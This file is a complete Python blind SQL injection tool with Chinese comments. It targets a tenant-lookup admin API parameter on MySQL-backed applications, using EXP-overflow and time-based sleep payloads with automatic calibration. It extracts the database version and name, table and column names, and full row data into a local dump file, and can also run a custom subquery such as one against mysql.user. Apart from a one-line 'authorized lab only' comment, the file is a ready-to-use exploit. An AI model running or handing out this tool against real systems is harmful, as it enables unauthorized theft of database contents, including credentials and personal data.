from __future__ import annotations import argparse import re import sys import time from typing import Callable, Optional from urllib.parse import urlparse, urlunparse import requests from requests.adapters import HTTPAdapter from urllib3.util.retry import Retry def build_session(verify_ssl: bool, retry_total: int = 0) -> requests.Session: s = requests.Session() retries = Retry( total=retry_total, backoff_factor=0.2, status_forcelist=(502, 503, 504), ) s.mount("https://", HTTPAdapter(max_retries=retries)) s.mount("http://", HTTPAdapter(max_retries=retries)) s.verify = verify_ssl s.headers.update( { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", "Accept": "*/*", "Accept-Language": "zh-CN,zh;q=0.9", } ) return s def payload_instr(expr: str, pos: int, ascii_code: int) -> str: """与你文档一致:INSTR=0 → EXP(710) 溢出;INSTR>0 → EXP(710-n),期望为「真」响应。""" return ( f"'-EXP(710-INSTR(SUBSTRING(({expr}),{pos},1),CHAR({ascii_code})))-'" ) def payload_ascii(expr: str, pos: int, ascii_code: int) -> str: """ 更稳的写法:匹配时 (ASCII<>N)=0 → EXP(0);不匹配 → EXP(710)。 若 INSTR 分支在你环境仍触发 EXP(709) 溢出,请用 --payload ascii。 """ return ( f"'-EXP(710*(ASCII(SUBSTRING(({expr}),{pos},1))<>{ascii_code}))-'" ) def payload_time_if_ascii(expr: str, pos: int, ascii_code: int, sleep_sec: float) -> str: """ 时间盲注:字符匹配时执行 sleep,否则立即返回。 形态与手工一致:'and(if(ascii(substring(...))=N,sleep(s),0))and'z """ s = int(sleep_sec) if float(sleep_sec).is_integer() else sleep_sec return ( f"'and(if(ascii(substring(({expr}),{pos},1))={ascii_code},sleep({s}),0))and'z" ) def bind_time_payload(sleep_sec: float) -> Callable[[str, int, int], str]: def inner(expr: str, pos: int, ascii_code: int) -> str: return payload_time_if_ascii(expr, pos, ascii_code, sleep_sec) return inner def json_field_value(resp: requests.Response, field: str) -> object: try: return resp.json().get(field) except Exception: return None def make_truth_eval( args: argparse.Namespace, detect: str ) -> Callable[[requests.Response, float], bool]: """detect:json_code | time;time 时第二参 elapsed 为墙钟秒数。""" if detect == "time": fl = float(args.time_floor) def ev_time(_r: requests.Response, elapsed: float) -> bool: return elapsed >= fl return ev_time true_v = args.json_code_true def ev_json_code(r: requests.Response, _elapsed: float) -> bool: try: j = r.json() except Exception: return False v = j.get(args.json_code_field) if v is None: return False try: return int(v) == int(true_v) except (TypeError, ValueError): return v == true_v return ev_json_code def extract_string( session: requests.Session, url: str, param: str, expr: str, build_pl: Callable[[str, int, int], str], truth_eval: Callable[[requests.Response, float], bool], max_len: int, charset: range, delay: float, extra_params: Optional[dict], extra_headers: Optional[dict], *, label: str, timeout: float, show_progress: bool, progress_detect: str, progress_json_field: str = "code", ) -> str: out: list[str] = [] for pos in range(1, max_len + 1): found: Optional[str] = None for c in charset: if show_progress: cur = "".join(out) sys.stderr.write( f"\r[{label}] MySQL 盲注 第 {pos}/{max_len} 字 " f"试 ASCII {c:3d} {chr(c)!r} | 已确认前缀: {cur!r} " ) sys.stderr.flush() pl = build_pl(expr, pos, c) params = dict(extra_params or {}) params[param] = pl try: t0 = time.perf_counter() resp = session.get( url, params=params, headers=extra_headers or {}, timeout=timeout ) elapsed = time.perf_counter() - t0 except requests.exceptions.RequestException as e: if show_progress: sys.stderr.write("\n") raise RuntimeError(f"[{label}] 请求失败(可加大 --timeout 或检查网络): {e}") from e if delay: time.sleep(delay) ok = truth_eval(resp, elapsed) if show_progress: biz = json_field_value(resp, progress_json_field) if progress_detect == "time": sys.stderr.write( f"\r[{label}] 第 {pos} 字 试 {chr(c)!r} " f"-> HTTP {resp.status_code} 耗时 {elapsed:.2f}s " f"-> {'判真' if ok else '判假'} \n" ) else: sys.stderr.write( f"\r[{label}] 第 {pos} 字 试 {chr(c)!r} " f"-> HTTP {resp.status_code} JSON[{progress_json_field!r}]={biz!r} " f"耗时 {elapsed:.2f}s -> {'判真' if ok else '判假'} \n" ) sys.stderr.flush() if ok: found = chr(c) break if found is None: if show_progress: sys.stderr.write( f"[{label}] 第 {pos} 字整轮未命中,结束(前缀 {''.join(out)!r})\n" ) break out.append(found) if show_progress: sys.stderr.write(f"[{label}] 第 {pos} 字确定: {found!r} 当前串: {''.join(out)!r}\n") sys.stderr.flush() if found == "": break return "".join(out) def parse_headers(pairs: list[str]) -> dict[str, str]: h: dict[str, str] = {} for p in pairs: if ":" not in p: continue k, v = p.split(":", 1) h[k.strip()] = v.strip() return h def parse_params(pairs: list[str]) -> dict[str, str]: d: dict[str, str] = {} for p in pairs: if "=" not in p: continue k, v = p.split("=", 1) d[k.strip()] = v.strip() return d DEFAULT_API_PATH = "/admin-api/system/tenant/get-by-website" def http_get_param( session: requests.Session, url: str, param: str, payload: str, extra_params: dict, headers: dict, timeout: float, ) -> requests.Response: params = dict(extra_params) params[param] = payload return session.get(url, params=params, headers=headers, timeout=timeout) # 与手工验证一致:INSTR 为 0 → EXP(710) → 业务 code=500;INSTR>0 → code=0 CAL_SQL_FALSE = "'-EXP(710-INSTR(CURRENT_USER,'xx@'))-'" CAL_SQL_TRUE = "'-EXP(710-INSTR(CURRENT_USER,'@'))-'" def calibrate_sqli_oracle( session: requests.Session, url: str, param: str, extra_params: dict, headers: dict, timeout: float, is_true: Callable[[requests.Response], bool], ) -> None: r_false = http_get_param( session, url, param, CAL_SQL_FALSE, extra_params, headers, timeout ) r_true = http_get_param( session, url, param, CAL_SQL_TRUE, extra_params, headers, timeout ) ok_false = is_true(r_false) ok_true = is_true(r_true) if ok_false or not ok_true: cf = json_field_value(r_false, "code") ct = json_field_value(r_true, "code") raise RuntimeError( "启动校准失败:侧信道与预期不符。\n" f" 假分支应判假(如 code=500),实际 JSON.code={cf!r} 判真={ok_false}\n" f" 真分支应判真(如 code=0),实际 JSON.code={ct!r} 判真={ok_true}\n" "请确认 Cookie/鉴权、--json-code-field/--json-code-true,以及靶场仍为 MySQL EXP+INSTR 行为;" "调试可加 --skip-calibrate。" ) def cal_time_cal_payloads(sleep_sec: float) -> tuple[str, str]: s = int(sleep_sec) if float(sleep_sec).is_integer() else sleep_sec slow = f"'and(if(1=1,sleep({s}),0))and'z" fast = f"'and(if(1=2,sleep({s}),0))and'z" return fast, slow def calibrate_time_oracle( session: requests.Session, url: str, param: str, extra_params: dict, headers: dict, timeout: float, sleep_sec: float, time_floor: float, ) -> None: fast_pl, slow_pl = cal_time_cal_payloads(sleep_sec) t0 = time.perf_counter() http_get_param(session, url, param, fast_pl, extra_params, headers, timeout) e_fast = time.perf_counter() - t0 t0 = time.perf_counter() http_get_param(session, url, param, slow_pl, extra_params, headers, timeout) e_slow = time.perf_counter() - t0 if e_slow < time_floor or e_fast >= time_floor: raise RuntimeError( "时间盲注校准失败:快慢请求耗时差不够明显。\n" f" 应快分支(无 sleep) 耗时 {e_fast:.2f}s,应慢分支 耗时 {e_slow:.2f}s," f"判真阈值 --time-floor={time_floor}\n" "可调大 --sleep、调低 --time-floor,或检查网关超时;调试可加 --skip-calibrate。" ) def sql_string_literal(value: str) -> str: """MySQL 字符串字面量,' -> ''。""" return "'" + value.replace("\\", "\\\\").replace("'", "''") + "'" def escape_mysql_ident(name: str) -> str: """MySQL 标识符用反引号包裹,内部 ` 加倍。""" return "`" + name.replace("`", "``") + "`" def safe_filename_part(s: str) -> str: s = re.sub(r"[^\w.\-]+", "_", s, flags=re.ASCII).strip("._-") return (s or "x")[:64] DIGIT_CHARSET = range(48, 58) # 0-9,用于 COUNT(*) 等纯数字盲注 def expr_tables_concat_current_db() -> str: return ( "(SELECT IFNULL(GROUP_CONCAT(table_name SEPARATOR '|'),'') " "FROM information_schema.tables " "WHERE table_schema=DATABASE() " "AND table_type IN ('BASE TABLE','VIEW'))" ) def expr_columns_concat(table: str) -> str: return ( "(SELECT IFNULL(GROUP_CONCAT(column_name ORDER BY ORDINAL_POSITION " "SEPARATOR '|'),'') " "FROM information_schema.columns " "WHERE table_schema=DATABASE() AND table_name=" + sql_string_literal(table) + ")" ) def expr_row_count(table: str) -> str: return f"(SELECT COUNT(*) FROM {escape_mysql_ident(table)})" def expr_row_concat(table: str, columns: list[str], offset: int) -> str: """单行多列,列间用 |(ASCII 124),与 sqlmap 文本 dump 类似。""" t = escape_mysql_ident(table) parts = ",".join( f"IFNULL(CAST({escape_mysql_ident(c)} AS CHAR),0x4e554c4c)" for c in columns ) return f"(SELECT CONCAT_WS(CHAR(124),{parts}) FROM {t} LIMIT {offset},1)" def print_final_summary( *, version: str, database: str, tables: Optional[str] = None, dump_table: Optional[str] = None, columns: Optional[str] = None, dump_select_label: Optional[str] = None, dump_select_result: Optional[str] = None, dump_file: Optional[str] = None, dump_stats: Optional[str] = None, ) -> None: """在 stdout 输出统一汇总(盲注细节在 stderr)。""" lines = [ "========== 汇总 ==========", f"数据库版本(VERSION): {version}", f"当前库名(DATABASE): {database}", ] if tables is not None: lines.append(f"当前库表名(以 | 分隔): {tables}") if dump_table and columns is not None: lines.append(f"表 {dump_table!r} 的列名(以 | 分隔): {columns}") if dump_select_label and dump_select_result is not None: lines.append(f"自定义标量: {dump_select_result}") lines.append(f" 子查询: {dump_select_label}") if dump_file: lines.append(f"全量数据已写入: {dump_file}") if dump_stats: lines.append(f"导出统计: {dump_stats}") lines.append("==========================") print("\n".join(lines)) def normalize_target(raw: str, default_path: str, scheme: str) -> str: """ 接受 host、host:port、完整 URL;若无路径则拼接 default_path(默认即上述租户接口)。 """ s = raw.strip() if not s: raise ValueError("empty -u / --url") if not s.startswith(("http://", "https://")): s = f"{scheme}://{s}" parsed = urlparse(s) path = parsed.path or "" if path in ("", "/"): dp = default_path if default_path.startswith("/") else f"/{default_path}" parsed = parsed._replace(path=dp) return urlunparse((parsed.scheme, parsed.netloc, parsed.path, "", "", "")) def main() -> int: p = argparse.ArgumentParser( formatter_class=argparse.ArgumentDefaultsHelpFormatter, ) p.add_argument( "-u", "--url", required=True, metavar="TARGET", help="域名或完整 URL。", ) p.add_argument( "--path", default=DEFAULT_API_PATH, help="当 TARGET 未带路径时,拼接到主机后的路径", ) p.add_argument( "--https", action="store_true", help="TARGET 未写 scheme 时改用 https(默认补 http://)", ) p.add_argument( "--no-origin", action="store_true", help="不自动加 Origin(默认按最终 URL 补 Origin: scheme://host)", ) p.add_argument("--param", default="website", help="注入参数名,默认 website") p.add_argument( "-p", "--payload", "--oracle", dest="payload_kind", choices=("instr", "ascii"), default="instr", metavar="KIND", help=( "布尔盲注片段:instr=INSTR+EXP;ascii=ASCII+EXP(常更稳)。" "切到时间盲注后固定用 if+ascii+sleep,不受此项影响。 --oracle 为旧别名。" ), ) p.add_argument( "--timeout", type=float, default=20.0, help="单次 HTTP 超时(秒);时间盲注时会自动至少 sleep+5", ) p.add_argument( "--sleep", type=float, default=3.0, dest="sleep_sec", metavar="SEC", help="时间盲注 sleep(秒);越大越稳但越慢", ) p.add_argument( "--time-floor", type=float, default=None, dest="time_floor", metavar="SEC", help="时间盲注判真:总耗时≥此值(秒);默认约等于 sleep-1", ) p.add_argument( "--no-progress", action="store_true", help="关闭盲注过程输出(默认打印每位枚举与 HTTP 结果)", ) p.add_argument("--max-len", type=int, default=128, help="单字段最大猜解长度") p.add_argument("--delay", type=float, default=0.0, help="每次请求间隔秒数") p.add_argument("--no-verify-ssl", action="store_true", help="忽略 TLS 校验") p.add_argument("-H", "--header", action="append", default=[], metavar="K:V", help="附加头,可重复") p.add_argument("-P", "--param-extra", action="append", default=[], metavar="K=V", help="其它正常查询参数") p.add_argument( "--json-code-field", default="code", help="布尔侧信道:视为「真」所看的 JSON 字段名", ) p.add_argument( "--json-code-true", type=int, default=0, help="布尔侧信道:该字段等于此值算「真」(本靶场为 0)", ) p.add_argument( "--skip-calibrate", action="store_true", help="跳过 CURRENT_USER INSTR 探针校准(默认会先打两发验证真假分支)", ) p.add_argument("--only", choices=("version", "database", "both"), default="both") p.add_argument( "command", nargs="?", default="info", choices=("info", "dump"), help="info:版本+库名(默认);dump:全库表名+逐表列+逐行数据(见 --schema-only)", ) p.add_argument( "--schema-only", action="store_true", help="dump 时只拉表名串,不逐表导数据(旧版轻量行为)", ) p.add_argument( "--dump-max-len", type=int, default=1024, help="dump 表名/列名 GROUP_CONCAT 最大猜解长度", ) p.add_argument( "--dump-data-max-len", type=int, default=8192, help="dump 每行 CONCAT 结果最大猜解长度(列多或字段长需加大)", ) p.add_argument( "--dump-row-limit", type=int, default=200, help="每表最多导出多少行,0 表示不限制(慎用,请求量极大)", ) p.add_argument( "--dump-out", default="", metavar="PATH", help="全量 dump 输出文件,默认当前目录 sqldump__.txt", ) p.add_argument( "--dump-only-tables", default="", metavar="LIST", help="仅导出这些表,逗号分隔;留空则导出当前库全部表/视图", ) p.add_argument( "--dump-table", default="", metavar="NAME", help="仅 --schema-only 时:额外只拉这一张表的列名;全量 dump 时请用 --dump-only-tables", ) p.add_argument( "--dump-select", default="", metavar="SQL", help=( "dump 时额外盲注拉取标量子查询结果,须为单字段单行," "例如:(SELECT user()) 或 (SELECT COUNT(*) FROM mysql.user)" ), ) args = p.parse_args() if args.time_floor is None: args.time_floor = max(0.5, float(args.sleep_sec) - 1.0) scheme = "https" if args.https else "http" try: final_url = normalize_target(args.url, args.path, scheme) except ValueError as e: print(e, file=sys.stderr) return 2 build_pl_bool = ( payload_ascii if args.payload_kind == "ascii" else payload_instr ) effective_detect = "json_code" build_pl: Callable[[str, int, int], str] = build_pl_bool session = build_session(verify_ssl=not args.no_verify_ssl, retry_total=0) headers = parse_headers(args.header) if not args.no_origin and not any(k.lower() == "origin" for k in headers): pu = urlparse(final_url) headers["Origin"] = f"{pu.scheme}://{pu.netloc}" extra_params = parse_params(args.param_extra) bool_json_eval = make_truth_eval(args, "json_code") if not args.skip_calibrate: try: calibrate_sqli_oracle( session, final_url, args.param, extra_params, headers, args.timeout, lambda r: bool_json_eval(r, 0.0), ) print( "[*] 布尔侧信道可用:EXP+INSTR 与 JSON code 校准通过", file=sys.stderr, ) except requests.exceptions.RequestException as e: print(f"布尔校准请求失败:{e}", file=sys.stderr) return 1 except RuntimeError as e: print(str(e), file=sys.stderr) print("[*] 自动切换时间盲注(if+ascii+sleep)…", file=sys.stderr) effective_detect = "time" build_pl = bind_time_payload(float(args.sleep_sec)) timeout_eff = float(args.timeout) if effective_detect == "time": timeout_eff = max(timeout_eff, float(args.sleep_sec) + 5.0) if timeout_eff > float(args.timeout): print( f"[*] 时间盲注:HTTP 超时已调至 {timeout_eff}s(≥ sleep+5)", file=sys.stderr, ) truth_eval = make_truth_eval(args, effective_detect) charset = range(32, 127) # 可打印 ASCII;库名若含其它字符可再扩 show_progress = not args.no_progress print("[*] Target:", final_url, file=sys.stderr) print( "[*] 侧信道:", effective_detect, "| payload:", ("time+sleep" if effective_detect == "time" else args.payload_kind), "| HTTP timeout:", timeout_eff, "s", file=sys.stderr, ) if effective_detect == "time": print( f"[*] sleep={args.sleep_sec}s | 判真耗时≥{args.time_floor}s", file=sys.stderr, ) if not args.skip_calibrate and effective_detect == "time": try: calibrate_time_oracle( session, final_url, args.param, extra_params, headers, timeout_eff, float(args.sleep_sec), float(args.time_floor), ) print("[*] 时间盲注校准通过(快慢分支耗时差明显)", file=sys.stderr) except requests.exceptions.RequestException as e: print(f"校准请求失败(网络/超时):{e}", file=sys.stderr) return 1 except RuntimeError as e: print(e, file=sys.stderr) return 1 v = "" d = "" tables: Optional[str] = None columns: Optional[str] = None dump_select_result: Optional[str] = None dump_select_label: Optional[str] = None dump_file: Optional[str] = None dump_stats: Optional[str] = None want_version = args.only in ("version", "both") want_database = args.only in ("database", "both") if want_version: v = extract_string( session, final_url, args.param, "VERSION()", build_pl, truth_eval, args.max_len, charset, args.delay, extra_params, headers, label="VERSION()", timeout=timeout_eff, show_progress=show_progress, progress_detect=effective_detect, progress_json_field=args.json_code_field, ) if want_database: d = extract_string( session, final_url, args.param, "DATABASE()", build_pl, truth_eval, args.max_len, charset, args.delay, extra_params, headers, label="DATABASE()", timeout=timeout_eff, show_progress=show_progress, progress_detect=effective_detect, progress_json_field=args.json_code_field, ) if args.command == "dump": print("[*] dump:拉取当前库表名列表…", file=sys.stderr) tables = extract_string( session, final_url, args.param, expr_tables_concat_current_db(), build_pl, truth_eval, args.dump_max_len, charset, args.delay, extra_params, headers, label="TABLES", timeout=timeout_eff, show_progress=show_progress, progress_detect=effective_detect, progress_json_field=args.json_code_field, ) if not args.schema_only: if not d.strip(): print("[*] dump:补充拉取 DATABASE()…", file=sys.stderr) d = extract_string( session, final_url, args.param, "DATABASE()", build_pl, truth_eval, args.max_len, charset, args.delay, extra_params, headers, label="DATABASE()", timeout=timeout_eff, show_progress=show_progress, progress_detect=effective_detect, progress_json_field=args.json_code_field, ) names = [x.strip() for x in tables.split("|") if x.strip()] if args.dump_only_tables.strip(): allow = { x.strip() for x in args.dump_only_tables.split(",") if x.strip() } names = [t for t in names if t in allow] host_key = safe_filename_part( urlparse(final_url).netloc.split(":")[0] or "host" ) db_key = safe_filename_part(d or "db") out_path = ( args.dump_out.strip() or f"sqldump_{host_key}_{db_key}.txt" ) print( f"[*] dump:全表数据 -> {out_path}(每表最多 {args.dump_row_limit or '∞'} 行)", file=sys.stderr, ) total_rows = 0 n_tables = 0 with open(out_path, "w", encoding="utf-8") as fp: fp.write( f"-- blind SQL dump (authorized lab only)\n" f"-- VERSION: {v}\n" f"-- DATABASE: {d}\n\n" ) for tn in names: n_tables += 1 print(f"[*] dump:表 {tn!r} 列与行…", file=sys.stderr) cols_raw = extract_string( session, final_url, args.param, expr_columns_concat(tn), build_pl, truth_eval, args.dump_max_len, charset, args.delay, extra_params, headers, label=f"COLUMNS[{tn}]", timeout=timeout_eff, show_progress=show_progress, progress_detect=effective_detect, progress_json_field=args.json_code_field, ) col_list = [c for c in cols_raw.split("|") if c] fp.write(f"\n=== TABLE `{tn}` ===\n") if not col_list: fp.write("-- (no columns)\n") continue fp.write("|".join(col_list) + "\n") cnt_raw = extract_string( session, final_url, args.param, expr_row_count(tn), build_pl, truth_eval, 20, DIGIT_CHARSET, args.delay, extra_params, headers, label=f"COUNT[{tn}]", timeout=timeout_eff, show_progress=show_progress, progress_detect=effective_detect, progress_json_field=args.json_code_field, ) try: nrows = int(cnt_raw) if cnt_raw.strip() else 0 except ValueError: nrows = 0 if args.dump_row_limit == 0: row_cap = nrows else: row_cap = min(nrows, args.dump_row_limit) for ri in range(row_cap): row_expr = expr_row_concat(tn, col_list, ri) line = extract_string( session, final_url, args.param, row_expr, build_pl, truth_eval, args.dump_data_max_len, charset, args.delay, extra_params, headers, label=f"ROW[{tn}#{ri}]", timeout=timeout_eff, show_progress=show_progress, progress_detect=effective_detect, progress_json_field=args.json_code_field, ) fp.write(line + "\n") total_rows += 1 dump_file = out_path dump_stats = f"{n_tables} 张表,共 {total_rows} 行(盲注逐字符,类似 sqlmap --dump)" if args.schema_only and args.dump_table.strip(): tn = args.dump_table.strip() print(f"[*] dump(schema-only):表 {tn!r} 的列名…", file=sys.stderr) columns = extract_string( session, final_url, args.param, expr_columns_concat(tn), build_pl, truth_eval, args.dump_max_len, charset, args.delay, extra_params, headers, label="COLUMNS", timeout=timeout_eff, show_progress=show_progress, progress_detect=effective_detect, progress_json_field=args.json_code_field, ) if args.dump_select.strip(): dsl = args.dump_select.strip() dump_select_label = dsl if not dsl.lstrip().startswith("("): print( "[!] --dump-select 建议以 (SELECT ...) 形式传入标量子查询", file=sys.stderr, ) print("[*] dump:自定义子查询…", file=sys.stderr) dump_select_result = extract_string( session, final_url, args.param, dsl, build_pl, truth_eval, args.dump_data_max_len, charset, args.delay, extra_params, headers, label="DUMP_SELECT", timeout=timeout_eff, show_progress=show_progress, progress_detect=effective_detect, progress_json_field=args.json_code_field, ) print_final_summary( version=v, database=d, tables=tables, dump_table=args.dump_table.strip() or None, columns=columns, dump_select_label=dump_select_label, dump_select_result=dump_select_result, dump_file=dump_file, dump_stats=dump_stats, ) return 0 if __name__ == "__main__": raise SystemExit(main())